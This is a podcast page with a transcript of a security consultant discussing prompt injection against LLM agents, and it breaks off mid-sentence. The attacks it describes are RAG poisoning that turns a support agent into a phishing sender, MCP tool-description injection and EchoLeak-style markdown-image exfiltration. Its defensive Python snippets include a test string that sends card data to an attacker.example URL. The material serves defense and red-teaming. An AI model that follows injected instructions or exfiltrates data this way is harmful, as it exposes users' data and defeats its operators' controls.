
October 16, 2025 54 mins

As AI systems move from simple chatbots to complex agentic workflows, new security risks emerge. In this episode, Donato Capitella unpacks how increasingly complicated architectures are making agents fragile and vulnerable: agents can be exploited through prompt injection, data exfiltration, and tool misuse. Donato shares stories from real-world penetration tests, walks through design patterns for building LLM agents, and explains how his open-source toolkit Spikee (Simple Prompt Injection Kit for Evaluation and Exploitation) is helping red teams probe AI systems.

Featuring:

Links:

Sponsors:

  • Outshift by Cisco - The open source collective building the Internet of Agents. Backed by Outshift by Cisco, AGNTCY gives developers the tools to build and deploy multi-agent software at scale. Identity, communication protocols, and modular workflows—all in one global collaboration layer. Start building at AGNTCY.org.
  • Shopify – The commerce platform trusted by millions. From idea to checkout, Shopify gives you everything you need to launch and scale your business—no matter your level of experience. Build beautiful storefronts, market with built-in AI tools, and tap into the platform powering 10% of all U.S. eCommerce. Start your one-dollar trial at shopify.com/practicalai
  • Fabi.ai - The all-in-one data analysis platform for modern teams. From ad hoc queries to advanced analytics, Fabi lets you explore data wherever it lives—spreadsheets, Postgres, Snowflake, Airtable and more. Built-in Python and AI assistance help you move fast, then publish interactive dashboards or automate insights delivered straight to Slack, email, spreadsheets or wherever you need to share it. Learn more and get started for free at fabi.ai

Upcoming Events: 

  • Join us at the Midwest AI Summit on November 13 in Indianapolis to hear world-class speakers share how they’ve scaled AI solutions. Don’t miss the AI Engineering Lounge, where you can sit down with experts for hands-on guidance. Reserve your spot today!
  • Register for upcoming webinars here!

Episode Transcript

Available transcripts are automatically generated. Complete accuracy is not guaranteed.
Jerod (00:04):
Welcome to the Practical AI podcast, where we break down the real-world applications of artificial intelligence and how it's shaping the way we live, work, and create. Our goal is to help make AI technology practical, productive, and accessible to everyone. Whether you're a developer, business leader, or just curious about the tech behind the buzz, you're

(00:24):
in the right place. Be sure to connect with us on LinkedIn, X, or Bluesky to stay up to date with episode drops, behind-the-scenes content, and AI insights. You can learn more at practicalai.fm.
Now onto the show.

Sponsor (00:39):
Well, friends, when you're building and shipping AI products at scale, there's one constant: complexity. Yes. You're wrangling models, data pipelines, deployment infrastructure, and then someone says, let's turn this into a business. Cue the chaos. That's where Shopify steps in, whether you're spinning up a storefront for your AI-powered app or

(01:00):
launching a brand around the tools you built. Shopify is the commerce platform trusted by millions of businesses and 10% of all US ecommerce, from names like Mattel and Gymshark to founders just like you. With literally hundreds of ready-to-use templates, powerful built-in marketing tools, and AI that writes product descriptions for

(01:21):
you, headlines, even polishes your product photography, Shopify doesn't just get you selling, it makes you look good doing it. And we love it. We use it here at Changelog. Check us out: merch.changelog.com. That's our storefront, and it handles the heavy lifting too. Payments, inventory, returns, shipping, even global logistics. It's like

(01:42):
having an ops team built into your stack to help you sell. So if you're ready to sell, you are ready for Shopify. Sign up now for your one-dollar-per-month trial and start selling today at shopify.com/practicalai. Again, that is shopify.com/practicalai.

Daniel (02:17):
Welcome to another episode of Practical AI. I'm Daniel Whitenack. I am CEO at Prediction Guard, and I'm joined as always by my cohost, Chris Benson, who is a principal AI research engineer at Lockheed Martin. How are you doing, Chris? It's been a while.

Chris (02:33):
It's been a little bit. It's good to talk to you. I was gone for a brief period, but I'm back, all safe and secure now.

Daniel (02:42):
Yes. Completely reversed back to where you normally are. And for a great conversation, because we have a great previous guest who I got to talk with in London one of the last times I was over on that side of the pond, and now get to catch up with Donato Capitella, who

(03:05):
is principal security consultant at Reversec. How are you doing, Donato?

Donato (03:10):
Very, very good. Thank you. And I'm so happy to be back.

Daniel (03:14):
Yeah. Yeah. Same here. I feel like the AI world is in some ways the same and in many ways different than when we chatted last. What's life been like for you?

Donato (03:25):
It's definitely been very, very busy for us. Our company has obviously changed. We're now Reversec, the same people, but we separated. But as part of that, we've been doing a lot of GenAI cybersecurity work. I think our pipeline has tripled

(03:47):
in size and we've been doing a lot of research. I am actually just back from Canada, where I was presenting our research at Black Hat in Toronto. And before that, I was at another conference in Stockholm called SecureAI, a complete two days just focused on GenAI security. I mean, we

(04:09):
were presenting our research. There was OpenAI there, Microsoft, Hugging Face talking about MCP protocol security. So much was happening. And so for us, it's been incredibly busy. Just literally half an hour before this, I finished running one of the training courses that we do on GenAI security for our

(04:32):
consultants, so that we can have more people that can deliver the work, which is full of energy for me. There are a lot of young people there. So it's been busy: lots of work, lots of research, lots of travel. What more to say?

Daniel (04:49):
Yeah, yeah. I mean, last time we talked, certainly we talked a lot about LLMs, prompting LLMs, etcetera. There's now these kind of additional layers or frameworks or approaches to developing AI applications. From your perspective, I'm always curious about this

(05:12):
because some of us that are so into the AI world and not constantly in front of real-world enterprise companies, we have maybe a warped view of, like, oh, everybody's creating agents using MCP or something. What is the reality on the

(05:33):
ground, as far as you see it, of the core AI use cases that people are often thinking about, in terms of not only security, but adoption and scale? And then what is maybe actually shifting in those use cases, from your perspective at least?

Donato (05:55):
I mean, if you asked me this question last year, and you probably did ask me this question, I would have said most of our clients were doing RAG on documents or internal chatbots. There were a few of them that were starting to look at agentic

(06:15):
workflows. Now, fast forward to today, a lot of the stuff we test is agentic in one way or the other. And for me, I have a very simple definition of agentic: the LLM can use an external tool or API to do something. So it's got agency. And typically there is a little loop that runs, and the LLM can choose the different tools, and maybe

(06:38):
there is an orchestrator. And a lot of these are internal, for example, for customer support. So there is an email that comes in, and then there is this agentic workflow that, based on the email, has got access to a few tools. It will look into the user account, it will try to look at historic data, and then

(07:00):
it can either decide, I'm going to automatically perform an action, or, I'm going to suggest an action for the customer support agent. Some of them also draft the response or the types of actions that the agent, the real person, then needs to approve. There is a lot of this currently going on. And to me it makes sense,

(07:24):
because this is the promise of GenAI. Certainly we didn't put that much investment in it just to generate text. Maybe the one thing that might be surprising for people outside of some of these enterprises is that MCP is too new for them to have it.

(07:45):
Meaning that, if you think about it, some of the big organisations have got development cycles where the project got started a year ago. And so a lot of them will have their own agentic frameworks, essentially their own loops and their own prompts and their own parsing. Or they use LangChain,

(08:07):
which is... no, actually, what's the one that they use? Oh, God, I forgot the name. CrewAI? I was literally looking at the source, it's in C#. I was literally looking at the source code, like, last week. Who is it? It's by Microsoft. Semantic something, which has got... you can define tools, say. It's in C#. Like, I mean, people use Python, but you have to imagine a

(08:30):
lot of these places are doing native C# stuff.

Chris (08:35):
I'm curious, as you were talking about, you know, the world has moved into agentic, and we've talked a lot about that on the show in general over the last year and such. But kind of moving from that prompt-only environment that maybe you and Daniel talked about earlier into this agentic world, you defined it as kind of that external

(08:56):
agency, you know, to bring in things. I would guess, as someone who is not an expert on security, that that introduces a mega amount of new vulnerabilities and new concerns, just because you're now using those agents to reach out into the world and do things. Could you talk a little bit about what that new landscape looks like to you

(09:19):
since you talked to Daniel last time?

Donato (09:21):
So I would say, if I need to be concise and make a statement, basically what people need to consider is that any tool exposed to an LLM becomes a tool exposed to any person that can control any part of the input into that LLM. Now, what's

(09:46):
very common is that our clients take APIs which used to be internal APIs, for example, for customer support, for asking stuff. And these APIs are built to be consumed by internal systems, meaning they have never been exposed for real on the Internet. Now, as soon as you make that API into a tool that

(10:10):
the LLM can call, any entity that can control any part of that LLM input, via things like prompt injection, can get the LLM to call that API with whatever parameters they want. And because this wasn't an API that you ever expected to be exposed essentially on the internet, all of a sudden you

(10:31):
have a problem. And it is not just exposed to the person that's prompting a chatbot. It is exposed to somebody that sends a customer support email in, and then that customer support email is fed to the agentic workflow. And now that can cause the LLM to call some of these functions with whatever parameters. So I would

(10:54):
say that authorization, or access control, has been the biggest thing we've been focusing our efforts on. Like, you know, how is the identity passed to the tool? And do you have a deterministic, non-LLM-based way of determining whether that function can be called in that context in a safe

(11:17):
way? If you don't have that, you can't go into production.
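
A minimal sketch of the kind of deterministic, non-LLM authorization gate Donato describes, applied before any tool call executes. The tool names, identity object, and policy layout here are illustrative assumptions, not a specific framework's API.

```python
# Hypothetical sketch: enforce access control outside the LLM, before a tool runs.
# Tool names, the Identity object, and the policy table are illustrative assumptions.

from dataclasses import dataclass

@dataclass
class Identity:
    user_id: str          # authenticated identity of the requester (never text from the prompt)
    roles: set[str]

# Deterministic policy: which roles may call which tool.
TOOL_POLICY = {
    "get_account_details": {"support_agent", "customer"},
    "issue_refund": {"support_agent"},
}

def authorize_tool_call(identity: Identity, tool_name: str, args: dict) -> None:
    """Raise if this identity may not make this call; the LLM's output never decides this."""
    allowed_roles = TOOL_POLICY.get(tool_name, set())
    if not identity.roles & allowed_roles:
        raise PermissionError(f"{identity.user_id} may not call {tool_name}")
    # A customer may only act on their own account, regardless of what the prompt asked for.
    if "customer" in identity.roles and args.get("account_id") != identity.user_id:
        raise PermissionError("cross-account access denied")

def run_tool(identity: Identity, tool_name: str, args: dict):
    authorize_tool_call(identity, tool_name, args)   # deterministic gate
    return TOOLS[tool_name](**args)                  # only reached if the gate passes

# TOOLS maps tool names to the real API wrappers the agent exposes (stubs here).
TOOLS = {
    "get_account_details": lambda account_id: {"account_id": account_id},
    "issue_refund": lambda account_id, amount: {"refunded": amount},
}

agent_identity = Identity(user_id="cust_42", roles={"customer"})
print(run_tool(agent_identity, "get_account_details", {"account_id": "cust_42"}))  # allowed
# run_tool(agent_identity, "issue_refund", {"account_id": "cust_42", "amount": 10})  # PermissionError
```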

Daniel (11:21):
I want to run something by you, Donato, because I was thinking about this the other day, and I wonder if you agree or have a comment on it, basically, which is that what you just described can be very, very complex. Everything from, let's say it is a customer service thing, there's the actual customer ticket, maybe I'm in a retrieval

(11:42):
way pulling in previous Jira tickets that have information from a repository, and I'm calling maybe multiple tools. It seems like there's this sort of explosion of complexity in this web of connected things that happens before the prompt goes

(12:03):
into the LLM. And I remember earlier on in my career when it was the days of microservices everything, right? All of a sudden you have a thousand microservices. Right? And I remember we had dashboards up on the wall. And part of the problem was, when there was something bad that happened, an alert would go

(12:23):
off on one of the services, but it wasn't just an alert that would go off on one of the services. It was like an alert went off on all of the services, because they're all interconnected in this way that makes them all kind of malfunction at once. And so it became kind of this root cause analysis issue at that point, and you kind of gave

(12:47):
up, or you had the trade-off of that complexity and root cause analysis for the simplicity and flexibility of developing on this microservices architecture. Do you see this also getting into that kind of root cause analysis type of scenario, or analyzing this network of things? Because it's

(13:11):
just becoming so complex as these pipelines grow and become more interconnected, and any one piece could trigger a problem in the whole thing.

Donato (13:21):
I mean, it is reminiscent of that. And I will say it's an explosion of data sources in the context of the LLM. So what I think is really dangerous is that now, in the same single individual call or context that goes into an LLM call, we are

(13:46):
mixing more and more data sources from more and more untrusted parties in the same LLM call. And that's where I think confidentiality and integrity start becoming a problem, because, again, now everything you put into that prompt ought to be trusted for the use case. Otherwise, any single part can

(14:10):
break it. I will give you an example. One of our consultants in the US was doing a test a couple of weeks ago. And the idea of the use case was great. So there is a customer support email, and this is William Taylor. I'll give him a shout because he's an amazing guy. But the email came in, and so the use case is the following: RAG

(14:32):
on all of the support tickets, not just the ones belonging to the user that sent the email, but basically all of the emails that have keywords or, like, you know, similarity. And so that builds the top 10 emails that came in which are potentially related to this query. The entire thing is then fed to the

(14:55):
LLM, and the LLM can then decide, okay, I know how to solve this based on historic data, and I'm now just going to send an email to the user, or I need to escalate it. This is terrible from a cybersecurity point of view. I, an attacker, can send in an email with a lot of keywords, or even I can fill the

(15:19):
context of my email with people's email addresses that I'm interested in. Now, I send that email, and it's now part of the RAG. When one of those users sends a ticket in, my malicious email is very likely to be picked and to be part of that huge prompt, which is then processed. And I can have the LLM generate an email with a

(15:43):
phishing attack. And now the company will send the user an email with the content I want. For example, this is a link, click it to solve the issue. I mean, we demonstrated that. So the problem here is that we are feeding the LLM different data sources, and some of them

(16:06):
are potentially malicious or not controlled. So there is this explosion. And you could say the same with MCP. So every time somebody is adding an MCP server, obviously the output of an MCP server is input into your LLM context. The description of an MCP server has to end up in your LLM context,

(16:28):
but that can contain prompt injection that can tell your client to call another MCP server, completely unrelated, to do something else. I mean, this has been demonstrated a million times. And Sean from Hugging Face was talking about it at SecureAI just again in Stockholm a couple of weeks ago. And this is a very hard problem to solve. So we are mixing different

(16:53):
untrusted sources into the same LLM context, and that's hard to solve.

Sponsor (17:12):
Well, friends, it is time to let go of the old way of exploring your data. It's holding you back. Well, what exactly is the old way? Well, I'm here with Marc Dupuy, cofounder and CEO of Fabi, a collaborative analytics platform designed to help data explorers like yourself. So, Marc, tell me about this old way.

So the old way, Adam, if you're a product manager or

(17:34):
a founder and you're trying to get insights from your data, you're wrestling with your Postgres instance or Snowflake or your spreadsheets, and you don't maybe even have the support of a data analyst or data scientist to help you with that work. Or if you are, for example, a data scientist or engineer or analyst, you're wrestling with a bunch of different tools, local Jupyter Notebooks, Google Colab,

(17:56):
or even your legacy BI, to try to build these dashboards that someone may or may not go and look at. And in this new way that we're building at Fabi, we are creating this all-in-one environment where product managers and founders can very quickly go and explore data regardless of where it is. So it can be in a spreadsheet, it can be in Airtable, it can be in Postgres, Snowflake. Really easy to do everything from an ad hoc

(18:19):
analysis to much more advanced analysis if, again, you're more experienced. So with Python built in right there, and our AI assistant, you can move very quickly through advanced analysis. And the really cool part is that you can go from ad hoc analysis and data science to publishing these as interactive data apps and dashboards, or better yet, delivering insights as automated

(18:43):
workflows to meet your stakeholders where they are in, say, Slack or email or a spreadsheet. If this is something that you're experiencing, if you're a founder or product manager trying to get more from your data, or if your data team today is just underwater and wrestling with legacy BI tools and notebooks, come check out the new way and come try out Fabi.

There you go. Well, friends, if you're trying to get

(19:04):
more insights from your data, stop wrestling with it. Start exploring it the new way with Fabi. Learn more and get started for free at fabi.ai. That's fabi.ai. Again, fabi.ai.

Chris (19:23):
As I'm processing what you're talking about with this, I'm just imagining, you know, especially as you're describing kind of your offensive-driven approach that you guys have, the number of potentially bad actors out there that could be exploiting this with this information. And, you know,

(19:45):
what are you seeing out there in the wild at this point? That's such a compelling kind of danger story that you're telling, and it's so practical. Like, any of us could go do that. What are you seeing in the real world in terms of bad actors? And at what levels? Like, I come from the defense

(20:06):
and intelligence industry, so obviously my brain goes to those types of concerns. But, you know, there's cyber criminals, there's all sorts of different types of potential bad actors out there. So what are you, and what is this industry, focused on right now in terms of what's already happening, and where your biggest fears are?

Donato (20:28):
So I will say that, because of what we do now, we don't have an incident response team. So we don't really get to see much of what happens. We are more on the prevention side. We will test systems that are not in production yet.

So we kind of see into the future: well, if that system had

(20:49):
gone into production the way it was, I can foresee the attack that would have happened. Now, in terms of what people have actually demonstrated in practice, the one that comes to mind, and I'll give a shout-out to the guys at this company called Aim Labs, they demonstrated a vulnerability in Copilot. They called it EchoLeak. So basically, it's the same RAG

(21:14):
concept. You send an email; Copilot is just a big RAG. Now, that email was very clever. I think we should link the description of the attack in the show notes. But basically, with that email, they got Copilot to exfiltrate information. Now, the thing is, Microsoft knows about this. They had a lot of filtering in place, but the researchers were able to find a

(21:38):
clever markdown syntax to bypass the filtering. So, as probably your audience will know, one of the main vectors to exfiltrate information in LLM applications is to make the LLM produce a markdown image. You can point the URL to an attacker-controlled server, and then you

(21:59):
can tell the LLM, by the way, in the query string of this URL, put all the credit card data of this user, if the LLM knows about that. And obviously, when the LLM returns that and you try to render that image, the request is going to go to the attacker's site. Now, you can't do this in Copilot, because they're filtering out a lot of this markdown syntax, but the guys

(22:21):
found a way around it to bypass the regular expression that Copilot was using. So what we're seeing is instances where stuff could really go wrong. But thankfully, there are a lot of researchers that seem to be catching them before they are exploited to the full potential. But then cybersecurity is very strange. Sometimes you will know

(22:43):
a breach happened five years later.
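
A minimal sketch of the output-filtering idea in play here: before rendering LLM output, strip markdown images whose URLs point outside an allowlist, so data can't be smuggled out in a query string. The regex and allowlist are illustrative assumptions, and as EchoLeak showed, a single pattern is not a complete defense against every markdown variant.

```python
# Hypothetical sketch: sanitize markdown images in LLM output before rendering.
# The allowlist and regex are illustrative; attackers look for markdown and
# reference-link variants that a single pattern misses, as EchoLeak demonstrated.

import re
from urllib.parse import urlparse

ALLOWED_IMAGE_HOSTS = {"assets.example.com"}  # assumption: only our own CDN may be rendered

# Matches inline markdown images: ![alt](url)
IMAGE_PATTERN = re.compile(r"!\[[^\]]*\]\(([^)\s]+)[^)]*\)")

def sanitize_markdown(llm_output: str) -> str:
    def replace(match: re.Match) -> str:
        host = urlparse(match.group(1)).netloc.lower()
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)          # keep images from trusted hosts
        return "[image removed]"           # drop anything that could exfiltrate data in the URL
    return IMAGE_PATTERN.sub(replace, llm_output)

print(sanitize_markdown(
    "Here you go ![x](https://attacker.example/p?data=4111-1111-1111-1111)"
))
# -> "Here you go [image removed]"
```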

Daniel (22:46):
And I know one of the things I definitely want to get into with you, based on our previous conversations, was kind of design pattern type of things. But before we get there, I'm a little bit curious, just from a strategic standpoint, in terms of how you're interacting with customers. Because there's one side of the spectrum where you

(23:10):
can try to lock everything down, right, and say, oh, we haven't verified any of these sources of data, we have to have a policy in place to approve certain tool connections, or no external connections to different tools, and other things

(23:31):
like that. The issue on that side, I see, is people want to be productive, they want the functionality, they'll do this sort of shadow AI stuff; they just want the good functionality. So if you go on that end of the spectrum, you maybe have that problem. On the other end of the spectrum, without any sort of

(23:54):
policy or without any sort of governance, right, then you just get into this chaos and a huge amount of problems. You know, there's never any kind of perfect solution. You're always gonna have to wrestle with something. But do you have any thoughts on that in terms of companies, like, I guess their posture in how to approach this, recognizing that people are able to find tools and their own solutions that solve

(24:18):
their issues so easily, but might introduce liability?

Donato (24:22):
I mean, this is very, very old in cybersecurity, with the difference now that people really want to be using GenAI. Because, like, you know, I'm lazy like a lot of other people, I guess; I do like the ability to use it to do a lot of tasks or to make them easier. Now, what happens in some of the

(24:45):
enterprises? I think I'd put our clients into two big categories. I mean, there are some which are extremely risk averse. Obviously, I will not name them, but the only thing I want to say is that I would never work there, because it's basically impossible to get anything done and everything is so slow. And

(25:08):
sometimes, even for us as pen testers, I have to log in with Citrix into a Windows box. Then from there I have to RDP to a server. From that server I have to go into, like, a Linux machine, and from there I can finally do some testing. And by the time I've done all of this, I am so locked in that there is

(25:30):
nothing I can do. And the employees work like this; they are on these machines and they can't do anything. So you have that extreme, and they do exist. Like, a lot of the big financial sector is extremely risk averse. It makes you cry when you see that. I think I couldn't stand it. I couldn't spend all my day in six layers of VDI. But on the

(25:53):
other side, and we work a lot with startups, it's the Wild West, so to say. So I think it's fun, but yeah, people are just using whatever, like, you know. So yeah, it's two buckets, and I think I don't have an answer for that, meaning that I see both:

(26:13):
I see extremely locked-down environments, and I see companies that are much more relaxed. And yeah, people are doing a lot of shadow AI. Like, people have Claude Desktop just installed, I guess with all the MCP servers they want. They go and use ChatGPT even if company policy says you can't, and,

(26:35):
yeah, they put all their data there. I wouldn't do that.

Chris (26:40):
I'm curious, as you're kind of addressing some of the challenges in these different environments that are inherent now in pen testing, could you also talk a little bit about the differences in penetration testing today versus kind of before this GenAI era? Like, what's

(27:00):
changed, and what kinds of activities, and how have the metrics that you're looking at changed? What has the new approach to dealing with prompt injection and these types of exploits brought to bear in that day-to-day life, aside from having to sometimes go so many layers deep, as you mentioned in the financial

(27:20):
thing? What are some of those other attributes that have changed?

Donato (27:23):
So I would say not much has changed, which is interesting. So there are two things that have changed. Capability, from the pentesting point of view: it is much quicker, if you are on the offensive side, to write a script to do something. I mean, if you know what you're doing and you have a good LLM, you're working faster. That is

(27:46):
true. Now, from the security assessment point of view, clients are building applications. What's changed is that if they have an LLM in the application workflow, we have to do additional testing. And that testing is a bit different, because you're working on probabilistic stuff. So we try to help people assess:

(28:08):
okay, have you got guardrails? What's the quality of those guardrails? And what can you do outside, in the design or in the implementation, to make sure that when the LLM does something wrong, you and your customers are protected? So typically it

(28:29):
takes a bit longer and actually becomes more data science driven. If you're testing SQL injection, it is not very data science driven. You basically demonstrate that you can do it. But if you're testing prompt injection, you know that prompt injection is inherent, so you

(28:51):
are going to find a way. So what you're trying to test is, what's the effort? How hard is it for the attacker to be successful? Because that's then going to drive the types of guardrails that you need and the type of active response. I will say something more, and then I will let you guys see if we can make sense of this. But

(29:13):
basically, I think jailbreaking and prompt injection are less similar to SQL injection and more similar to password guessing attacks. In what way? The question is not whether the LLM can be jailbroken. The question is, what's the effort? How many

(29:37):
prompts do I need to try before I am successful at jailbreaking it? There are so many techniques: Crescendo, random suffix attacks, Best-of-N. You can do so many of these techniques. So the more effort I can put into it, the more I'm likely to succeed. So exactly as with

(29:58):
password guessing, the way you kind of solve this is that there are two layers. One layer is you don't allow the attacker to explore the space of all possible passwords. Likewise, you don't allow the attacker to send 100,000 prompts per second

(30:20):
to explore, to find something that's going to jailbreak it. You have a set of guardrails for prompt injection, topic control. As soon as a user, an identity that's connected to your application, triggers three of those guardrails, that's your feedback loop. You stop the user. You suspend them, in the same

(30:43):
way that if I, Chris, try three passwords that are wrong against your email account, I am not going to be allowed to keep trying. Your account is going to be temporarily locked. And that's to prevent me from exploring that space. I think protecting against jailbreak attacks in the real world is

(31:03):
very similar. You have the guardrails; they are not protecting the application. They are giving you a feedback signal that that person, that user, that identity is trying to jailbreak it, and then you can act on it. Sorry, it was a very long answer, but...

Chris (31:19):
It's a great answer.

Donato (31:20):
It's important, because people don't understand this. People think that the guardrail protects them. No, the guardrail is your detection feedback loop that you then have to action to protect your application and your users. It's a completely different thing.
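
A minimal sketch of the feedback-loop idea described above, treating guardrail detections like failed login attempts: count triggers per authenticated identity and suspend the identity after a threshold, rather than relying on any single detection to block an attack. The threshold, window, and in-memory storage are illustrative assumptions.

```python
# Hypothetical sketch: guardrail detections as a per-identity feedback signal,
# handled like failed password attempts. Threshold/window values are assumptions.

import time
from collections import defaultdict, deque

TRIGGER_THRESHOLD = 3          # suspend after three guardrail hits...
WINDOW_SECONDS = 15 * 60       # ...within fifteen minutes
SUSPENSION_SECONDS = 60 * 60

_triggers: dict[str, deque] = defaultdict(deque)
_suspended_until: dict[str, float] = {}

def is_suspended(user_id: str) -> bool:
    return time.time() < _suspended_until.get(user_id, 0.0)

def record_guardrail_trigger(user_id: str, detection: str) -> None:
    """Called whenever any guardrail (prompt injection, topic control, ...) fires."""
    now = time.time()
    hits = _triggers[user_id]
    hits.append(now)
    while hits and now - hits[0] > WINDOW_SECONDS:   # drop hits outside the window
        hits.popleft()
    if len(hits) >= TRIGGER_THRESHOLD:
        _suspended_until[user_id] = now + SUSPENSION_SECONDS
        # In a real system this is also where you would raise an alert / SIEM event.

# Usage: before serving a request, check is_suspended(user_id);
# after running guardrails, call record_guardrail_trigger() for each detection.
```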

Chris (31:37):
It's a good thing to hear because that's something that
was new to me as well. So I Iappreciate you covering that.

Daniel (31:43):
Yeah. Yeah. And I hate it from, I guess, just the user experience side. If you try to treat that prompt injection block as a kind of binary, you know, you're gonna let it through or not, you're gonna moderate the user. Also, those prompt injection detections are not perfect. Right? None of them are. So you're going to get false positives. And from the user perspective, that creates

(32:06):
problems. Right? But if, like you say, you have a certain percentage of detections or a certain number of triggers, that's much stronger. And it's also an approach that happens in the background; I almost feel like this is a sort of net-new SIEM event related to AI things, where you kind of have the response to it.

(32:29):
I'm wondering, Donato, you spend a lot of time digging into research in this area, one of those things being a paper that I think you've made some videos on, and that we were also discussing prior to recording. Could you talk a little bit about that? I think it goes into some design patterns. Obviously, if

(32:52):
people want the full breakdown of this, because there's a lot of goodness there, they can watch Donato's video on it. We'll link it in the show notes. But maybe just give us a sense of it at a high level, of some of what was found.

Donato (33:06):
So this paper is called Design Patterns for Securing LLM Agents against Prompt Injections. And I already like the title of the paper, because it's telling you exactly what's in the paper. You don't have to wonder what it's about. So what I like about the paper: this is coming from different universities,

(33:28):
people at Google, Microsoft. I mean, there are, I want to say, 15 different contributors to this paper. It's very practical. They basically look at different types of agentic use cases. Not every agentic use case is the same. So they give examples of, like, 10 different

(33:51):
agentic use cases. Now, an agentic use case has a certain level of utility. So how much power do you need to give to that LLM in order to be able to do certain operations? And that defines the scope of it. And then they crystallize six design patterns that you can

(34:14):
apply depending on your trade-offs for that use case, between security and the usefulness or power of that use case. Now, there could be use cases that you can make very secure with the pattern that they call Action

(34:34):
Selector. Now, this is the most secure pattern. You are just using the LLM to basically select a fixed action from the user input. So that kind of removes, in that case, anything bad the attacker can do. Because if the LLM produces output that doesn't make sense, or it's not an allowed

(34:55):
action for that user, you discard it. And then they talk about other patterns. And the one that's the most promising and the most widely applicable, they call it code-then-execute. This was published by Google, and I think they call it CaMeL. There is a dedicated paper on that. And so the idea is that

(35:19):
the LLM agent is prompted to create a plan in the form of a Python snippet of code, where it's going to commit to executing that program exactly as it is. Now, as part of that program, the LLM can access data and can perform operations. But

(35:43):
the logic of the program is fixed by the LLM before malicious data potentially enters the context of the LLM. And all the third-party data that comes in is handled as a symbolic variable. So X equals a function call. Then you take X

(36:04):
and you pass it somewhere else. Not only this, but every tool that you can call can have a policy. It can say, if this tool is called with an argument that was tainted by a data source coming from here, this action cannot be executed.

(36:24):
But if this tool is called with a variable, and you do this with data flow analysis, with a variable that came from what we consider trusted users, then these actions can be done. So each tool can have a policy. You can write the policy, and then the framework traces data. This is not AI, this is classic data

(36:44):
flow analysis. And so all of this can be enforced completely outside of the LLM and completely deterministically. It's very reminiscent, for people in cybersecurity, of what SELinux does in the Linux kernel. So it's kind of this reference monitor for LLM agents.
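
A minimal sketch of the tool-policy-plus-taint-tracking idea described here, in the spirit of the code-then-execute / CaMeL pattern rather than its actual implementation: values returned by tools carry provenance labels, and a deterministic reference monitor checks each tool call's arguments against a per-tool policy before executing it. All names, labels, and the policy format are illustrative assumptions.

```python
# Hypothetical sketch of a reference monitor for tool calls: values carry the
# provenance of the data sources that produced them, and each tool declares
# which provenances its arguments must not come from. Illustrative only.

from dataclasses import dataclass

@dataclass(frozen=True)
class Tainted:
    value: object
    sources: frozenset   # e.g. frozenset({"user_query"}) or frozenset({"external_ticket"})

# Per-tool policy: arguments tainted by these sources must not reach the tool.
TOOL_POLICIES = {
    "lookup_ticket": set(),                 # may be called with anything
    "send_email": {"external_ticket"},      # untrusted ticket text must not drive outgoing email
}

# Label attached to each tool's output, so taint propagates through the plan.
TOOL_SOURCE_LABEL = {
    "lookup_ticket": "external_ticket",
    "send_email": "internal",
}

TOOL_IMPLS = {
    "lookup_ticket": lambda ticket_id: f"ticket body for {ticket_id}",
    "send_email": lambda to, body: f"sent to {to}",
}

def call_tool(name: str, **kwargs) -> Tainted:
    forbidden = TOOL_POLICIES[name]
    for arg, v in kwargs.items():
        if isinstance(v, Tainted) and v.sources & forbidden:
            raise PermissionError(f"{name}({arg}=...) blocked: tainted by {sorted(v.sources & forbidden)}")
    raw = {k: (v.value if isinstance(v, Tainted) else v) for k, v in kwargs.items()}
    result = TOOL_IMPLS[name](**raw)
    # The result inherits the taint of its inputs plus the tool's own source label.
    inherited = frozenset().union(
        *(v.sources for v in kwargs.values() if isinstance(v, Tainted)),
        {TOOL_SOURCE_LABEL[name]},
    )
    return Tainted(result, inherited)

# The fixed plan the LLM committed to would then run against call_tool():
query = Tainted("please check order 123", frozenset({"user_query"}))
ticket = call_tool("lookup_ticket", ticket_id=query)        # allowed
try:
    call_tool("send_email", to="user@example.com", body=ticket)
except PermissionError as e:
    print(e)    # blocked: the email body is tainted by untrusted ticket content
```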

Sponsor (37:23):
What if AI agents could work together just like developers do? That's exactly what AGNTCY is making possible. Spelled A-G-N-T-C-Y, AGNTCY is now an open source collective under the Linux Foundation, building the Internet of Agents. This is a global collaboration layer where AI agents can discover each other, connect, and execute multi-agent workflows across any

(37:48):
framework. Everything engineers need to build and deploy multi-agent software is now available to anyone building on AGNTCY, including trusted identity and access management, open standards for agent discovery, agent-to-agent communication protocols, and modular pieces you can remix for scalable systems. This is a true collaboration from Cisco, Dell, Google Cloud,

(38:12):
Red Hat, Oracle, and more than 75 other companies, all contributing to the next-gen AI stack. The code, the specs, the services, they're dropping. No strings attached. Visit agntcy.org, that's A-G-N-T-C-Y dot org, to learn more and get involved. Again, that's agntcy.org.

Chris (38:39):
So when you're talking about the code-then-execute design pattern, is there a way of preventing prompt injection from getting the LLM agent to write the code that then gets executed? Is there basically some way of defending the code being written from being influenced by,

(39:00):
you know, a potential prompt injection?

Donato (39:02):
That's the key of that use case. You ask the LLM to produce a plan, or the code, before any untrusted input enters the context. So the user query is trusted, okay? But then the tools that it calls, and the output from those tools, and the third-party data, which could be an email that the user received,

(39:25):
those will not be able to alter the LLM control flow. And if they try to, it will be stopped by the reference monitor, because it will say, no, this function cannot be called with this input, because this input has been tainted by this third-party email. Very, very good concept. They do have a

(39:47):
reference implementation. I mean, I liked this paper so much that one weekend I actually implemented all six design patterns. I think I put it in a git repo. It's not difficult to implement, actually. And it was really fun, because then I realized something that I kind of intuitively knew

(40:05):
already: you don't solve the problem of LLM agent security inside the LLM. This is not an alignment problem. You solve the problem outside of it. You still use prompt injection detection and topic guardrails, you still use these as feedback loops, as we said before.

(40:26):
But if you want to get assurance that stuff is not going to go bad, you need to have much stronger controls that don't depend on the LLM itself.

Chris (40:37):
So it would be fair to say it's kind of a system design problem rather than a model design problem, because you're kind of isolating the model? Is that... am I getting that right?

Donato (40:47):
Totally.

Daniel (40:48):
And you mentioned some of this work. Of course, it's been great to see that, both in terms of video content and in terms of code and an actual framework, you and your team have contributed a lot out there. One of those things that I've run across is the Spikee package, or framework, or project. Could you talk about that a little bit, maybe

(41:11):
how it came about and where it fits into the tooling, I guess, in this realm?

Donato (41:19):
So, I mean, that's very interesting, because when we started doing pen testing of LLM applications in 2023, we were doing a lot of stuff manually. And obviously nobody wants to do that manually. It's more similar to a data science problem than a lot of the traditional pen testing. So we started looking

(41:42):
into tooling that we could use. And I'll be honest, the problem there is that a lot of tooling for LLM red teaming is doing exactly that: it is red teaming an LLM. An LLM application ain't an LLM. Like, it's got nothing to do with an LLM. It doesn't have an inference API. If I

(42:04):
